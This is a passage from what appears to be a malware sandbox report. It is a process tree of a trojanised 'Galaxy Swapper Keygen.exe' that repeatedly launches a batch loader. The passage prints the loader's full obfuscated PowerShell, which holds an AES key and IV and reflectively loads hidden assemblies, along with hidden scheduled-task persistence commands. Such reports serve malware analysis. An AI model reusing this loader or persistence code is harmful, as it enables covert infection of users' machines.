'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
17⤵
PID:6100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
17⤵
- Command and Scripting Interpreter: PowerShell
PID:6120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_10_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_10.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
18⤵
- Command and Scripting Interpreter: PowerShell
PID:11916

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_10.vbs"
18⤵
PID:11484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_10.bat" "
19⤵
PID:9036

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
16⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
17⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
17⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
18⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
19⤵
PID:3432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
19⤵
PID:3628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
20⤵
- Command and Scripting Interpreter: PowerShell
PID:1660

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_533.vbs"
20⤵
PID:6388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_533.bat" "
21⤵
PID:6688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_533.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
22⤵
PID:10276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
22⤵
- Command and Scripting Interpreter: PowerShell
PID:10284

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
18⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
19⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
20⤵
PID:1916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
20⤵
- Command and Scripting Interpreter: PowerShell
PID:2108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_714_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
21⤵
- Command and Scripting Interpreter: PowerShell
PID:7936

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
19⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
20⤵
PID:1872

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
20⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
21⤵
PID:260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
22⤵
PID:7148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
22⤵
PID:7160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_900_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_900.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
23⤵
- Command and Scripting Interpreter: PowerShell
PID:11164

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_900.vbs"
23⤵
PID:11652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_900.bat" "
24⤵
PID:11968

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
21⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
22⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
23⤵
PID:7028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
23⤵
- Command and Scripting Interpreter: PowerShell
PID:7040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_727_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_727.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
24⤵
- Command and Scripting Interpreter: PowerShell
PID:5484

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_727.vbs"
24⤵
PID:7500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_727.bat" "
25⤵
PID:3960

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
22⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
23⤵
PID:384

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
23⤵
PID:4632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
24⤵
PID:1728

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
24⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
25⤵
PID:356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
26⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
26⤵
PID:7520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
26⤵
- Command and Scripting Interpreter: PowerShell
PID:7444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_97_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_97.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
27⤵
- Command and Scripting Interpreter: PowerShell
PID:11916

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
25⤵
PID:2748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
26⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
27⤵
PID:6996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
27⤵
- Command and Scripting Interpreter: PowerShell
PID:7036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_252_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
28⤵
- Command and Scripting Interpreter: PowerShell
PID:10916

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.vbs"
28⤵
PID:11724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_252.bat" "
29⤵
PID:11956

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
26⤵
PID:72

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
27⤵
PID:1648

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
27⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
28⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
29⤵
PID:4452

